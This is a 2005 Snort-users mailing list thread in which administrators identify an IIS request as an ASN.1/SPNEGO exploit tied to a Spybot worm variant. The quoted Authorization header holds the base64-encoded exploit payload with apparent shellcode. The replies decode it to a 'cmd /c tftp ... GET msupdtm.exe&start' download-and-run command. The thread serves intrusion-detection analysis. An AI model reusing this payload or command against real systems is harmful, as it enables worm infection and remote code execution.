[Snort-users] Unrecognized attack patterns against IIS

TPanaitescu at ...2032... TPanaitescu at ...2032...
Sat Jun 11 09:52:18 EDT 2005


That's it, "cmd /c tftp -i 0.0.0.0 GET msupdtm.exe&start msupdtm.exe&exit" 
among other things! Good point! Thanks

Tudor



stephane nasdrovisky <stephane.nasdrovisky at ...12261...> 
06/11/2005 12:24 PM

To
TPanaitescu at ...2032...
cc
Michael Scheidell <scheidell at ...5171...>
Subject
Re: [Snort-users] Unrecognized attack patterns against IIS

Have you tried to base64-decode this string 
(http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx)? 
Don't forget the trailing ==.
It looks like http://www.sarc.com/avcenter/venc/data/w32.spybot.pkc.html
The decoded string contains: cmd /c tftp -i 0.0.0.0 GET msupdtm.exe

The worm filename is different in my network neighbourhood: cgy32win.exe, 
ms-upd.exe & win-logon.exe (98k-111k)

TPanaitescu at ...2032... wrote:

> Seen that too, it seems that it is a newer "patch" from MS for IE, or 
> IEs configured for this, trying to negotiate authorization using 
> SPNEGO from the GSS-API.  You can see the packets in full if you use a 
> sniffer in front of that web server, I used ethereal and got the info 
> below.
>
> Could be an attack also trying to get unauthorized access to a server. 
> Anyone with another clue?

ASN.1 attack.

> GET / HTTP/1.0
> Host: X.X.X.X
> Authorization: Negotiate
> YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
> UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
> BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
> UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
> BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
> UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK
> 2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDAuMC4wLjAgR0VUIG1zdXBkdG0uZXhlJnN0YXJ0IG1zdXBkdG0uZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJC
> QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk



-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20050611/4b6e4f1b/attachment.html>